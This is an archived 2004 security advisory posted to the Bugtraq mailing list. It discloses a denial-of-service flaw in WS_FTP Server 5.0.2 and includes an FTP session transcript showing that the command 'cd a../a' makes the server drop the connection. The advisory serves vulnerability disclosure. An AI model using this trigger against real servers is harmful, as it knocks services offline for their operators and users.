[vulnwatch] WS_FTP Server Denial of Service Vulnerability

To: "bugtraq" <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: [vulnwatch] WS_FTP Server Denial of Service Vulnerability
From: "lion" <lion@xxxxxxxxxxxx>
Date: Mon, 30 Aug 2004 02:40:46 +0800
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

[vulnwatch] WS_FTP Server Denial of Service Vulnerability

www.cnhonker.com
Security Advisory

Advisory Name: WS_FTP Server Denial of Service Vulnerability
Release Date: 08/30/2004
Affected version: WS_FTP Server 5.0.2
Author: lion <lion@xxxxxxxxxxxx>

Overview: 

A vulnerability has been found in WS_FTP Server. The problem \
is in the module of file path parse will cause FTP server to \
consume large amounts of CPU power.

Exploit:

E:\>ftp localhost
Connected to ibm.
220-ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
220-Fri Aug 27 14:12:19 2004
220-29 days remaining on evaluation.
220 ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
User (ibm:(none)): ftp
331 Password required
Password:
230 user logged in
ftp> cd a../a 
Connection closed by remote host.

About HUC:

HUC is still alive.

Prev by Date: CuteNews News.txt writable to world
Next by Date: DoS in Chat Anywhere 2.72a
Previous by thread: RE: CuteNews News.txt writable to world
Next by thread: DoS in Chat Anywhere 2.72a
Index(es):
- Date
- Thread